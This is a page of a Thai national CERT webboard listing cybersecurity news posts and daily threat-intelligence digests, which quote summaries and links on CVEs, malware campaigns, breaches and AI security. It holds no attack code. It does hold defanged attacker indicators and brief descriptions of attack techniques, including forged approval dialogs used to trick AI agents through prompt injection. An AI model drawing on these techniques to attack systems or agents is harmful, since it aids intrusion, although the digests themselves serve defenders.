NCSA Webboard
    Posts created by NCSA_THAICERT

    • GhostPoster malware hides malicious code in the logos of more than 17 Firefox extensions

      Follow the news on the webboard or on Facebook NCSA Thailand

      Posted in Cyber Security News by NCSA_THAICERT
    • Cyberattack hits Petróleos de Venezuela (PDVSA), temporarily disrupting exports

      Posted in Cyber Security News by NCSA_THAICERT
    • Android malware named “Cellik” hides inside apps on Google Play and steals a full range of user data

      Posted in Cyber Security News by NCSA_THAICERT
    • CISA releases six Industrial Control Systems (ICS) advisories

      On 16 December 2025 the Cybersecurity and Infrastructure Security Agency (CISA) released six advisories on industrial control systems (ICS), providing timely information on security issues, vulnerabilities and attacks affecting ICS. The advisories are:

      • ICSA-25-350-01 Güralp Systems FMUS (Fortimus) Series and MIN (Minimus) Series
      • ICSA-25-350-02 Johnson Controls PowerG, IQPanel and IQHub
      • ICSA-25-350-03 Hitachi Energy AFS, AFR and AFF Series
      • ICSA-25-350-04 Mitsubishi Electric GT Designer3
      • ICSA-25-224-02 Johnson Controls iSTAR Ultra, iSTAR Ultra SE, iSTAR Ultra G2, iSTAR Ultra G2 SE, iSTAR Edge G2 (Update A)
      • ICSA-25-308-01 Fuji Electric Monitouch V-SFT-6 (Update A)

      CISA encourages users and administrators to review the newly released ICS advisories for technical details and mitigations.

      Reference
      https://www.cisa.gov/news-events/alerts/2025/12/16/cisa-releases-seven-industrial-control-systems-advisories
      Posted in OT Cyber Security News by NCSA_THAICERT
    • CISA adds three exploited vulnerabilities to its catalog

      On 17 December 2025 the Cybersecurity and Infrastructure Security Agency (CISA) added three new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation in the wild:

      • CVE-2025-20393 Cisco Multiple Products Improper Input Validation Vulnerability
      • CVE-2025-40602 SonicWall SMA1000 Missing Authorization Vulnerability
      • CVE-2025-59374 ASUS Live Update Embedded Malicious Code Vulnerability

      CISA's directive BOD 22-01 established the Known Exploited Vulnerabilities (KEV) catalog as a list of CVEs that carry significant risk and are known to be exploited. Federal Civilian Executive Branch (FCEB) agencies are required to remediate the listed vulnerabilities by the specified due date to protect their networks against active threats.

      CISA will continue to update the KEV catalog with newly identified vulnerabilities so that it reflects the risks actually observed now and in the future.

      Reference
      Posted in Cyber Security News by NCSA_THAICERT
    • Cyber Threat Intelligence 18 December 2025

      Financial Sector

      • Banks Built Rules For Yesterday’s Crime And RegTech Is Trying To Fix That
        "Criminals are moving money across borders faster, and financial institutions are feeling the squeeze. Compliance teams feel this strain every day as they try to keep up with schemes that shift through accounts, intermediaries, and digital channels. A new academic review of regulatory technology, or RegTech, shows how this pressure is reshaping compliance work and why research in this field is gaining new weight."
        https://www.helpnetsecurity.com/2025/12/17/regulatory-technology-financial-crime-study/

      New Tooling

      • Zabbix: Open-Source IT And OT Observability Solution
        "Zabbix is an open source monitoring platform designed to track the availability, performance, and integrity of IT environments. It monitors networks along with servers, virtual machines, applications, services, databases, websites, and cloud resources. For cybersecurity professionals, this visibility matters because operational issues and security incidents often overlap. Early signs of compromise can surface as performance changes, service failures, or unusual system behavior that monitoring tools detect first."
        https://www.helpnetsecurity.com/2025/12/17/zabbix-open-source-it-ot-observability-solution/
        https://github.com/zabbix/zabbix

      Vulnerabilities

      • UAT-9686 Actively Targets Cisco Secure Email Gateway And Secure Email And Web Manager
        "Cisco Talos is tracking the active targeting of Cisco AsyncOS Software for Cisco Secure Email Gateway, formerly known as Cisco Email Security Appliance (ESA), and Cisco Secure Email and Web Manager, formerly known as Cisco Content Security Management Appliance (SMA), enabling attackers to execute system-level commands and deploy a persistent Python-based backdoor, AquaShell. Cisco became aware of this activity on December 10, which has been ongoing since at least late November 2025. Additional tools observed include AquaTunnel (reverse SSH tunnel), chisel (another tunneling tool), and AquaPurge (log-clearing utility). Talos' analysis indicates that appliances with non-standard configurations, as described in Cisco's advisory, are what we have observed as being compromised by the attack."
        https://blog.talosintelligence.com/uat-9686/
        https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sma-attack-N9bf4
        https://www.bleepingcomputer.com/news/security/cisco-warns-of-unpatched-asyncos-zero-day-exploited-in-attacks/
        https://www.theregister.com/2025/12/17/attacks_pummeling_cisco_0day/
        https://www.helpnetsecurity.com/2025/12/17/cisco-secure-email-cve-2025-20393/
      • Critical Arbitrary File Upload Vulnerability In Motors Theme Affecting 20k+ Sites
        "This blog post is about a Subscriber+ arbitrary file upload vulnerability in the Motors theme. If you're a Motors theme user, please update to at least version 5.6.82. This vulnerability was discovered and reported by Patchstack Alliance community member Denver Jackson."
        https://patchstack.com/articles/critical-arbitrary-file-upload-vulnerability-in-motors-theme-affecting-20k-sites/
        https://www.infosecurity-magazine.com/news/motors-wordpress-flaw-takeover/
      • Sonicwall Warns Of New SMA1000 Zero-Day Exploited In Attacks
        "SonicWall warned customers today to patch a vulnerability in the SonicWall SMA1000 Appliance Management Console (AMC) that was chained in zero-day attacks to escalate privileges. According to SonicWall, this medium-severity local privilege escalation security flaw (CVE-2025-40602) was reported by Clément Lecigne and Zander Work of the Google Threat Intelligence Group, and doesn't affect SSL-VPN running on SonicWall firewalls. "SonicWall PSIRT strongly advises users of the SMA1000 product to upgrade to the latest hotfix release version to address the vulnerability," the company said in a Wednesday advisory."
        https://www.bleepingcomputer.com/news/security/sonicwall-warns-of-new-sma1000-zero-day-exploited-in-attacks/
        https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0019
        https://thehackernews.com/2025/12/sonicwall-fixes-actively-exploited-cve.html
        https://securityaffairs.com/185809/hacking/sonicwall-warns-of-actively-exploited-flaw-in-sma-100-amc.html
        https://www.helpnetsecurity.com/2025/12/17/sonicwall-cve-2025-40602/
      • Libbiosig, Grassroot DiCoM, Smallstep Step-Ca Vulnerabilities
        "Cisco Talos’ Vulnerability Discovery & Research team recently disclosed vulnerabilities in Biosig Project Libbiosig, Grassroot DiCoM, and Smallstep step-ca. The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability disclosure policy, except for Grassroot, as the DiCoM vulnerabilities are zero-days."
        https://blog.talosintelligence.com/libbiosig-grassroot-dicom-smallstep-step-ca-vulnerabilities/
      • Defending Against The CVE-2025-55182 (React2Shell) Vulnerability In React Server Components
        "CVE-2025-55182 (also referred to as React2Shell and includes CVE-2025-66478, which was merged into it) is a critical pre-authentication remote code execution (RCE) vulnerability affecting React Server Components, Next.js, and related frameworks. With a CVSS score of 10.0, this vulnerability could allow attackers to execute arbitrary code on vulnerable servers through a single malicious HTTP request. Exploitation activity related to this vulnerability was detected as early as December 5, 2025."
        https://www.microsoft.com/en-us/security/blog/2025/12/15/defending-against-the-cve-2025-55182-react2shell-vulnerability-in-react-server-components/
        https://cyberscoop.com/react2shell-vulnerability-fallout-spreads/
      • Turning AI Safeguards Into Weapons With HITL Dialog Forging
        "This article provides a deeper technical analysis of the novel agentic AI attack vector: the LITL attack, which we recently developed and documented in Bypassing AI Agent Defenses With Lies-In-The-Loop. The LITL attack directly targets the HITL component, causing the agent to prompt the user with a seemingly benign HITL dialog that can deceive users into approving a remote code execution attack originating from indirect prompt injections."
        https://checkmarx.com/zero-post/turning-ai-safeguards-into-weapons-with-hitl-dialog-forging/
        https://www.infosecurity-magazine.com/news/lies-loop-attack-ai-safety-dialogs/

      Malware

      • GhostPairing Attacks: From Phone Number To Full Access In WhatsApp
        "Gen has discovered a novel WhatsApp account takeover campaign that we refer to as GhostPairing Attack. On the surface it looks very simple. Victims receive a message from one of their contacts, usually something along the lines of: “Hey, I just found your photo!” The message includes a link that appears as a Facebook style preview. When users open it, they see a page that imitates a Facebook viewer and asks them to “verify” before they can see the content."
        https://www.gendigital.com/blog/insights/research/ghostpairing-whatsapp-attack
        https://www.bleepingcomputer.com/news/security/whatsapp-device-linking-abused-in-account-hijacking-attacks/
      • React2Shell Used As Initial Access Vector For Weaxor Ransomware Deployment
        "S-RM has responded to an incident where a threat actor used the recently disclosed critical vulnerability known as React2Shell (CVE-2025-55182) to gain access to a corporate network and deploy ransomware. The deployment of ransomware in S-RM’s cases appears to have been automated, and the scope of compromise remained limited to the server which was vulnerable to React2Shell."
        https://www.s-rminform.com/latest-thinking/react2shell-used-as-initial-access-vector-for-weaxor-ransomware-deployment
        https://www.bleepingcomputer.com/news/security/critical-react2shell-flaw-exploited-in-ransomware-attacks/
      • Windows Persistence Explained: Techniques, Risks, And What Defenders Should Know
        "Modern Windows systems include many built-in features that help applications run smoothly and support everyday user activity. Unfortunately, many of these built-in functionalities can be exploited by threat actors in order to have malware payloads remain on a system and run without user interaction. These different features can be abused to be what security researchers call “persistence mechanisms.”"
        https://cofense.com/blog/windows-persistence-explained-techniques,-risks,-and-what-defenders-should-know
      • NuGet Malware Targets Nethereum Tools
        "This year, ReversingLabs (RL) researchers have discovered malware on various open-source software (OSS) platforms that target crypto users and developers. This is an attack trend RL saw explode in 2024, and it has continued in 2025 with crypto among threat actors' favored prey. This past year alone, RL researchers have identified crypto-focused malware on:"
        https://www.reversinglabs.com/blog/nuget-malware-crypto-oauth-tokens
        https://hackread.com/nuget-malicious-packages-steal-crypto-ad-data/
      • ClickFix: DarkGate
        "“ClickFix” is a form of social engineering rather than an autonomous malware. It represents a fast-growing method of initial system compromise, where attackers deceive users into executing harmful commands themselves, typically disguised as routine troubleshooting steps or verification procedures ultimately leading to the unintentional installation of malware."
        https://www.pointwild.com/threat-intelligence/clickfix-darkgate
        https://hackread.com/clickfix-attack-fake-browser-install-darkgate-malware/
      • Inside a Purchase Order PDF Phishing Campaign
        "A customer contacted me when Malwarebytes blocked the link inside a “purchase order” email they had received. When I examined the attachment, it soon became clear why we blocked it. The visible content of the PDF showed a button prompting the recipient to view the purchase order. Hovering over the button revealed a long URL that included a reference to a PDF viewer. While this might fool some people at first glance, a closer look raised red flags:"
        https://www.malwarebytes.com/blog/threat-intel/2025/12/inside-a-purchase-order-pdf-phishing-campaign
      • Operation ForumTroll Continues: Russian Political Scientists Targeted Using Plagiarism Reports
        "In March 2025, we discovered Operation ForumTroll, a series of sophisticated cyberattacks exploiting the CVE-2025-2783 vulnerability in Google Chrome. We previously detailed the malicious implants used in the operation: the LeetAgent backdoor and the complex spyware Dante, developed by Memento Labs (formerly Hacking Team). However, the attackers behind this operation didn’t stop at their spring campaign and have continued to infect targets within the Russian Federation."
        https://securelist.com/operation-forumtroll-new-targeted-campaign/118492/
        https://thehackernews.com/2025/12/new-forumtroll-phishing-attacks-target.html
      • Kimwolf Exposed: The Massive Android Botnet With 1.8 Million Infected Devices
        "On October 24, 2025, a trusted partner in the security community provided us with a brand-new botnet sample. The most distinctive feature of this sample was its C2 domain, 14emeliaterracewestroxburyma02132[.]su, which at the time ranked 2nd in the Cloudflare Domain Rankings. A week later, it even surpassed Google to claim the number one spot in Cloudflare's global domain popularity rankings. There is no doubt that this is a hyper-scale botnet. Based on the information output during runtime and its use of the wolfSSL library, we have named it Kimwolf."
        https://blog.xlab.qianxin.com/kimwolf-botnet-en/
        https://thehackernews.com/2025/12/kimwolf-botnet-hijacks-18-million.html
      • BlueDelta’s Persistent Campaign Against UKR.NET
        "Between June 2024 and April 2025, Recorded Future’s Insikt Group identified a sustained credential-harvesting campaign targeting users of UKR.NET, a widely used Ukrainian webmail and news service. The activity is attributed to the Russian state-sponsored threat group BlueDelta (also known as APT28, Fancy Bear, and Forest Blizzard). This campaign builds on BlueDelta’s earlier operations detailed in the May 2024 Insikt Group report “GRU’s BlueDelta Targets Key Networks in Europe with Multi-Phase Espionage Campaigns,” which documented GRU-linked credential theft and espionage activity. While this campaign does not reveal specific targets, BlueDelta’s historical focus on credential theft to enable intelligence collection provides strong indicators of likely intent to collect sensitive information from Ukrainian users in support of broader GRU intelligence requirements."
        https://www.recordedfuture.com/research/bluedeltas-persistent-campaign-against-ukrnet
        https://assets.recordedfuture.com/insikt-report-pdfs/2025/cta-ru-2025-1217.pdf
        https://therecord.media/russian-bluedelta-hackers-ran-phishing-ukraine-webmail
        https://thehackernews.com/2025/12/apt28-targets-ukrainian-ukr-net-users.html
      • Exclusive: RSF Uncovers New Spyware From Belarus
        "Reporters Without Borders (RSF)’s Digital Security Lab (DSL), working with the Eastern European organisation RESIDENT.NGO, has uncovered a previously unknown spyware tool used by the State Security Committee (KGB) of Belarus to target, among others, journalists and media workers. RSF assesses that this exposure is a serious setback for the KGB’s operations, not least because the software appears to have been in use for several years."
        https://rsf.org/en/exclusive-rsf-uncovers-new-spyware-belarus
        https://therecord.media/spyware-belarus-journalist-rsf
      • From Linear To Complex: An Upgrade In RansomHouse Encryption
        "RansomHouse is a ransomware-as-a-service (RaaS) operation run by a group that we track as Jolly Scorpius. Recent samples of the associated binaries used in RansomHouse operations reveal a significant upgrade in encryption. This article explores the upgrade of RansomHouse encryption and the potential impact for defenders. Jolly Scorpius uses a double extortion strategy. This strategy combines stealing and encrypting a victim's data with threats to leak the stolen data."
        https://unit42.paloaltonetworks.com/ransomhouse-encryption-upgrade/

      Breaches/Hacks/Leaks

      • Auto Parts Giant LKQ Confirms Oracle EBS Breach
        "Automotive parts giant LKQ Corporation has confirmed that it has been impacted by the recent cybercrime campaign targeting customers of the Oracle E-Business Suite (EBS) solution. The Fortune 500 company provides recycled, refurbished, and aftermarket components for cars and other types of vehicles. LKQ was one of the first victims of the Oracle EBS hack named on the Cl0p ransomware website, where the cybercriminals behind the campaign have been listing targeted organizations."
        https://www.securityweek.com/auto-parts-giant-lkq-confirms-oracle-ebs-breach/
        https://www.infosecurity-magazine.com/news/lkq-confirms-oracle-ebs-breach/
      • GNV Ferry Fantastic Under Cyberattack Probe Amid Remote Hijack Fears
        "French prosecutors are investigating a suspected cyberattack on the GNV ferry Fantastic, raising fears of a potential remote hijack. The ferry Fantastic sails between Sète and North Africa, and French authorities are investigating a suspected attempt to compromise the ship’s IT systems. Italian intelligence, prompted by GNV, alerted French authorities about two sailors, a Latvian and a Bulgarian, suspected of spying for a foreign power. The Paris prosecutor’s cybercrime unit is investigating an organized attack on automated data systems, allegedly to serve a foreign power."
        https://securityaffairs.com/185800/hacking/gnv-ferry-fantastic-under-cyberattack-probe-amid-remote-hijack-fears.html

      General News

      • November 2025 APT Attack Trends Report (South Korea)
        "AhnLab is monitoring APT (Advanced Persistent Threat) attacks in South Korea using our own infrastructure. This report covers the classification and statistics of APT attacks in South Korea that were identified over the course of one month in November 2025. It also provides an overview of the features of each attack type."
        https://asec.ahnlab.com/en/91587/
      • AI Breaks The Old Security Playbook
        "AI has moved into enterprise operations faster than many security programs expected. It is embedded in workflows, physical systems, and core infrastructure. Some AI tools reach hundreds of millions of users each week. Inference costs have fallen 280-fold, but overall spending is still rising because usage keeps growing. Attackers are using the same tools. CISOs manage a broader attack surface driven by automation, new data paths, and machine led decisions. Deloitte’s Tech Trends 2026 shows how this shift is changing what CISOs and other technology leaders are responsible for."
        https://www.helpnetsecurity.com/2025/12/17/deloitte-enterprise-ai-defense-report/
      • Strengthening Cyber Resilience As AI Capabilities Advance
        "Cyber capabilities in AI models are advancing rapidly, bringing meaningful benefits for cyberdefense as well as new dual-use risks that must be managed carefully. For example, capabilities assessed through capture-the-flag (CTF) challenges have improved from 27% on GPT-5 in August 2025 to 76% on GPT-5.1-Codex-Max in November 2025."
        https://openai.com/index/strengthening-cyber-resilience/
        https://blog.barracuda.com/2025/12/16/openai-ai-model-cybersecurity-warning
      • Zeroday Cloud Hacking Event Awards $320,000 For 11 Zero Days
        "The Zeroday Cloud hacking competition in London has awarded researchers $320,000 for demonstrating critical remote code execution vulnerabilities in components used in cloud infrastructure. The first hacking event focused on cloud systems, the competition is hosted by Wiz Research in partnership with Amazon Web Services, Microsoft, and Google Cloud. The researchers were successful in 85% of the hacking attempts across 13 hacking sessions, demonstrating 11 zero-day vulnerabilities."
        https://www.bleepingcomputer.com/news/security/zeroday-cloud-hacking-event-awards-320-0000-for-11-zero-days/
      • France Arrests Suspect Tied To Cyberattack On Interior Ministry
        "French authorities arrested a 22-year-old suspect on Tuesday for a cyberattack that targeted France's Ministry of the Interior earlier this month. In a statement issued by Public Prosecutor Laure Beccuau, officials said the suspected hacker was arrested on December 17, 2025, as part of an investigation into the attack. "A person was arrested on December 17, 2025, as part of the investigation opened by the cybercrime unit of the Paris public prosecutor's office, on charges including unauthorized access to an automated personal data processing system implemented by the State, committed by an organized group, following the cyberattack against the Ministry of the Interior," reads the statement translated into English."
        https://www.bleepingcomputer.com/news/security/france-arrests-suspect-tied-to-cyberattack-on-interior-ministry/
        https://therecord.media/france-interior-ministry-email-breach-investigation
        https://hackread.com/france-arrests-hacker-interior-ministry-systems/
      • 'I Quit!' - When CISOs Need To Take Charge Of Their Careers
        "A recent LinkedIn post has been circulating in cybersecurity circles, written as a CISO's resignation letter - "effective immediately." It resonates with security leaders who know the pattern - budget requests denied, risks that are documented and escalated, and a breach that follows a known vulnerability. Then the CISO was hit by inevitable question: "Why didn't you prevent this?""
        https://www.bankinfosecurity.com/blogs/i-quit-when-cisos-need-to-take-charge-their-careers-p-4002
      • In Cybersecurity, Claude Leaves Other LLMs In The Dust
        "New sobering data confirms what many in cybersecurity already know: that while large language models (LLMs) are improving significantly in ways that generate profits for their developers, they're missing the improvements that would keep them safe and secure. In its second Potential Harm Assessment & Risk Evaluation (PHARE) LLM benchmark report, researchers at Giskard tested brand name models from OpenAI, Anthropic, xAI, Meta, Google, and others on their ability to resist jailbreaks, avoid hallucinations and biases, and more. Two things immediately pop out in the data: how little progress is being made across the industry, and how much of it is being carried by Anthropic alone."
        https://www.darkreading.com/cybersecurity-analytics/cybersecurity-claude-llms
      • Why You Should Train Your SOC Like a Triathlete
        "Triathletes learn a simple truth early. Fancy gear cannot overcome a junk food diet. The same holds for security operations. AI has become an integral part of daily security operations center work, but its performance is capped by the quality of the evidence it consumes. Thin or noisy inputs slow investigations, increase fatigue, and create doubt."
        https://www.darkreading.com/cybersecurity-operations/why-you-should-train-your-soc-like-triathlete
      • AI Is Reshaping Modern Cybercrime
        "Fortinet has been working closely with UC Berkeley’s Center for Long-Term Cybersecurity (CLTC), the Berkeley Risk and Security Lab (BRSL), and public- and private-sector partners, including academia, as part of the AI-Enabled Cybercrime Initiative. This effort uses global tabletop exercises (TTXs), research, and policy analysis to understand how AI is shaping cybercrime and how defenders can stay ahead. As part of this coordinated work, CLTC has published an academic analysis of the Singapore TTX, From Automation to Autonomy: The Next Leap in AI-Enabled Cybercrimes, authored by Dr. Gil Baram, Helena Huang, and me."
        https://www.fortinet.com/blog/industry-trends/ai-is-reshaping-modern-cybercrime
        https://cltc.berkeley.edu/publication/from-automation-to-autonomy-the-next-leap-in-ai-enabled-cybercrimes/
      • Why Vulnerability Reports Stall Inside Shared Hosting Companies
        "Security teams keep sending vulnerability notifications, and the same pattern keeps repeating. Many alerts land, few lead to fixes. A new qualitative study digs into what happens after those reports arrive and explains why remediation so often stops short. The research comes from the Center for Information Security Saarbrücken and is based on in-depth interviews with 24 hosting provider organizations across shared hosting, VPS services, and web agencies. The researchers focused on how providers receive, process, and act on vulnerability notifications, rather than testing new notification formats or channels."
        https://www.helpnetsecurity.com/2025/12/17/hosting-provider-vulnerability-notifications-remediation/
      • NMFTA Warns Of Surge And Sophistication Of Cyber-Enabled Cargo Theft
        "The National Motor Freight Traffic Association (NMFTA) has issued another warning to the logistics and transportation industry as traditional cargo theft is being rapidly replaced by sophisticated, cyber-enabled heists. CargoNet reported in October that it recorded over 700 cargo thefts in the US and Canada in the third quarter of 2025, with the value of the stolen goods totaling more than $111 million. According to the American Trucking Associations, thieves targeting freight shipments cost the US economy up to $35 billion per year. While in the past thieves would in most cases rob truck drivers at gunpoint or break into trailers, this type of crime has become increasingly sophisticated, mainly driven by criminals’ reliance on hacker tactics."
        https://www.securityweek.com/nmfta-warns-of-surge-and-sophistication-of-cyber-enabled-cargo-theft/
      • Five Cybersecurity Predictions For 2026: Identity, AI, And The Collapse Of Perimeter Thinking
        "Cybersecurity has always evolved in response to attacker innovation, but the pace of change over the last few years has been unprecedented—particularly with the emergence of weaponized AI to scale phishing, deepfakes, and voice cloning. As we head toward 2026, several structural shifts are becoming impossible to ignore. Traditional security assumptions are breaking down, threat actors are scaling faster than defenders, and identity—not infrastructure—has become the primary battleground. Here are five predictions that will shape the cybersecurity landscape in 2026:"
        https://www.securityweek.com/five-cybersecurity-predictions-for-2026-identity-ai-and-the-collapse-of-perimeter-thinking/
      • FBI Disrupts Virtual Money Laundering Service Used To Facilitate Criminal Activity
        "The United States Attorney’s Office for the Eastern District of Michigan announced today a coordinated action with international partners and the Michigan State Police to disrupt and take down the online infrastructure used to operate E-Note, a cryptocurrency exchange that allegedly facilitated money laundering by transnational cyber-criminal organizations, including those targeting U.S. healthcare and critical infrastructure. Since 2017, the FBI identified more than $70,000,000 of illicit proceeds of ransomware attacks and account takeovers transferred via E-Note payment service and money mule network, including laundered funds stolen or extorted from U.S. victims."
        https://www.justice.gov/usao-edmi/pr/fbi-disrupts-virtual-money-laundering-service-used-facilitate-criminal-activity
        https://therecord.media/fbi-takes-down-alleged-money-laundering-operation
      • ESET Threat Report H2 2025
        "The second half of the year underscored just how quickly attackers adapt and innovate, with rapid changes sweeping across the threat landscape. AI-powered malware moved from theory to reality in H2 2025, as ESET discovered PromptLock, the first known AI-driven ransomware, capable of generating malicious scripts on the fly. While AI is still mainly used for crafting convincing phishing and scam content, PromptLock – and the handful of other AI-driven threats identified to this day – signal a new era of threats."
        https://www.welivesecurity.com/en/eset-research/eset-threat-report-h2-2025/

      Reference
      Electronic Transactions Development Agency (ETDA)

      Posted in Cyber Security News by NCSA_THAICERT
    • Cyber Threat Intelligence 17 December 2025

      Healthcare Sector

      • The Messy Data Trails Of Telehealth Are Becoming a Security Nightmare
        "In this Help Net Security interview, Scott Bachand, CIO/CISO at Ro, discusses how telehealth reshapes the flow of patient data and what that means for security. He explains why organizations must strengthen data classification and visibility as systems and vendors multiply. He also outlines how regulations and new technologies are driving a more adaptive approach to protecting patient information."
        https://www.helpnetsecurity.com/2025/12/16/scott-bachand-ro-telehealth-security/

      Vulnerabilities

      • JUMPSHOT: XM Cyber Uncovers Critical Local Privilege Escalation (CVE-2025-34352) In JumpCloud Agent
        "XM Cyber Researcher Hillel Pinto uncovered CVE-2025-34352, a critical vulnerability in the JumpCloud Remote Assist for Windows agent (versions prior to 0.317.0). The flaw allows any low-privileged local user to exploit insecure file operations—arbitrary file write/delete—performed by the agent running as NT AUTHORITY\SYSTEM within the user’s temporary directory. This vulnerability is immediately exploitable to achieve Local Privilege Escalation (LPE) or cause a Denial of Service (DoS). Users must update immediately to version 0.317.0 or later to patch the issue."
        https://xmcyber.com/blog/jumpshot-xm-cyber-uncovers-critical-local-privilege-escalation-cve-2025-34352-in-jumpcloud-agent/
        https://www.securityweek.com/jumpcloud-remote-assist-vulnerability-can-expose-systems-to-takeover/
        https://www.infosecurity-magazine.com/news/jumpcloud-windows-agent-flaw/
        https://hackread.com/jumpcloud-remote-assist-flaw-full-devices-control/
      • God Mode On: Researchers Run Doom On a Vehicle’s Head Unit After Remotely Attacking Its Modem
        "Imagine you are a driver speeding down the highway in your brand-new electric car. All of a sudden, the entire massive multimedia display is filled with Doom, the iconic 3D shooter game, replacing the navigation map or the controls menu, and you realize someone is playing it right now by remotely controlling the character. This is not a dream or an overactive imagination, but a realistic scenario in today’s world, as vividly demonstrated by Kaspersky ICS CERT experts."
        https://ics-cert.kaspersky.com/publications/reports/2025/11/20/god-mode-on-researchers-run-doom-on-a-vehicles-head-unit-after-remotely-attacking-its-modem/

      Malware

      • Arctic Wolf Observes Malicious SSO Logins On FortiGate Devices Following Disclosure Of CVE-2025-59718 And CVE-2025-59719
"On December 12, 2025, Arctic Wolf began observing intrusions involving malicious SSO logins on FortiGate appliances. Fortinet had previously released an advisory for two critical authentication bypass vulnerabilities (CVE-2025-59718 and CVE-2025-59719) on December 9, 2025. Arctic Wolf had also sent out a security bulletin for the vulnerabilities shortly thereafter. These vulnerabilities allow unauthenticated bypass of SSO login authentication via crafted SAML messages, if the FortiCloud SSO feature is enabled on affected devices. Several product lines were reported to be affected, including FortiOS, FortiWeb, FortiProxy, and FortiSwitchManager."
        https://arcticwolf.com/resources/blog/arctic-wolf-observes-malicious-sso-logins-following-disclosure-cve-2025-59718-cve-2025-59719/
        https://www.bleepingcomputer.com/news/security/hackers-exploit-newly-patched-fortinet-auth-bypass-flaws/
        https://thehackernews.com/2025/12/fortinet-fortigate-under-active-attack.html
        https://www.securityweek.com/in-the-wild-exploitation-of-fresh-fortinet-flaws-begins/
        https://securityaffairs.com/185748/security/hackers-are-exploiting-critical-fortinet-flaws-days-after-patch-release.html
      • Inside GhostPoster: How a PNG Icon Infected 50,000 Firefox Users
        "Every extension has a logo. A tiny image sitting in your toolbar, a visual shorthand for trust. You glance at it, you recognize it, you move on. You probably never think about what's actually inside that file. The authors of GhostPoster are counting on that. Our risk engine, Wings, flagged anomalous behavior in a Firefox extension called Free VPN Forever. The extension was reading its own logo file, standard behavior, but then doing something unusual with the raw bytes. When we dug into the code, we found a hidden extraction routine. The extension wasn't just displaying the logo. It was searching through the image data, looking for a marker that shouldn't be there."
        https://www.koi.ai/blog/inside-ghostposter-how-a-png-icon-infected-50-000-firefox-browser-users
        https://www.bleepingcomputer.com/news/security/ghostposter-attacks-hide-malicious-javascript-in-firefox-addon-logos/
      • Meet Cellik - A New Android RAT With Play Store Integration
        "Cellik is a newly identified Android RAT that offers full device control and real-time surveillance, with Play Store integration that lets attackers bundle it into legitimate apps. Discovered via cybercrime networks, Cellik comes packed with capabilities previously seen only in advanced spyware: real-time screen streaming, keylogging, remote camera/microphone access, hidden web browsing, notification interception, and even an app-injection system for stealing data from other apps. Uniquely, Cellik integrates with Google Play Store apps and includes a one-click APK builder, allowing attackers to wrap its payload inside legitimate apps for stealthy, widespread deployment."
        https://iverify.io/blog/meet-cellik---a-new-android-rat-with-play-store-integration
        https://www.bleepingcomputer.com/news/security/cellik-android-malware-builds-malicious-versions-from-google-play-apps/
      • Ink Dragon Expands With New Tools And a Growing Victim Network
        "Ink Dragon is a long running espionage group that several security vendors allege to be a China-linked threat actor, based on behavioral and infrastructure indicators. Its activity has grown from operations in Southeast Asia and South America to a rising number of intrusions in European government networks. Check Point Research has tracked this expansion through a series of quiet but disciplined campaigns, many of which initially appeared unremarkable until deeper investigation exposed a consistent pattern of stealthy escalation."
        https://blog.checkpoint.com/research/ink-dragon-expands-with-new-tools-and-a-growing-victim-network/
        https://www.theregister.com/2025/12/16/chinas_ink_dragon_hides_out/
      • BlindEagle Targets Colombian Government Agency With Caminho And DCRAT
        "In early September 2025, Zscaler ThreatLabz discovered a new spear phishing campaign attributed to BlindEagle, a threat actor who operates in South America and targets users in Spanish-speaking countries, such as Colombia. In this campaign, BlindEagle targeted a government agency under the control of the Ministry of Commerce, Industry and Tourism (MCIT) in Colombia using a phishing email sent from what appears to be a compromised account within the same organization. In this blog post, ThreatLabz explores the attack chain and analyzes the techniques employed, including the use of a fake web portal, nested JavaScript and PowerShell scripts, steganography to conceal malicious payloads, Caminho as a downloader, and DCRAT as the final payload."
        https://www.zscaler.com/blogs/security-research/blindeagle-targets-colombian-government-agency-caminho-and-dcrat
      • GuardDuty Extended Threat Detection Uncovers Cryptomining Campaign On Amazon EC2 And Amazon ECS
        "Amazon GuardDuty and our automated security monitoring systems identified an ongoing cryptocurrency (crypto) mining campaign beginning on November 2, 2025. The operation uses compromised AWS Identity and Access Management (IAM) credentials to target Amazon Elastic Container Service (Amazon ECS) and Amazon Elastic Compute Cloud (Amazon EC2). GuardDuty Extended Threat Detection was able to correlate signals across these data sources to raise a critical severity attack sequence finding. Using the massive, advanced threat intelligence capability and existing detection mechanisms of Amazon Web Services (AWS), GuardDuty proactively identified this ongoing campaign and quickly alerted customers to the threat. AWS is sharing relevant findings and mitigation guidance to help customers take appropriate action on this ongoing campaign."
        https://aws.amazon.com/blogs/security/cryptomining-campaign-targeting-amazon-ec2-and-amazon-ecs/
        https://thehackernews.com/2025/12/compromised-iam-credentials-power-large.html
      • Malicious NuGet Package Typosquats Popular .NET Tracing Library To Steal Wallet Passwords
        "The Socket Threat Research Team uncovered a malicious NuGet package, Tracer.Fody.NLog, that typosquats and impersonates the legitimate Tracer.Fody library and its maintainer. It presents itself as a standard .NET tracing integration but in reality functions as a cryptocurrency wallet stealer. Inside the malicious package, the embedded Tracer.Fody.dll scans the default Stratis wallet directory, reads *.wallet.json files, extracts wallet data, and exfiltrates it together with the wallet password to threat actor-controlled infrastructure in Russia at 176[.]113[.]82[.]163."
        https://socket.dev/blog/malicious-nuget-package-typosquats-popular-net-tracing-library
        https://thehackernews.com/2025/12/rogue-nuget-package-poses-as-tracerfody.html
      • React2Shell Vulnerability Actively Exploited To Deploy Linux Backdoors
        "The security vulnerability known as React2Shell is being exploited by threat actors to deliver malware families like KSwapDoor and ZnDoor, according to findings from Palo Alto Networks Unit 42 and NTT Security. "KSwapDoor is a professionally engineered remote access tool designed with stealth in mind," Justin Moore, senior manager of threat intel research at Palo Alto Networks Unit 42, said in a statement."
        https://thehackernews.com/2025/12/react2shell-vulnerability-actively.html
        https://unit42.paloaltonetworks.com/cve-2025-55182-react-and-cve-2025-66478-next/
        https://jp.security.ntt/insights_resources/tech_blog/react2shell_malware_zndoor/

      Breaches/Hacks/Leaks

      • Cyberattack Disrupts Venezuelan Oil Giant PDVSA's Operations
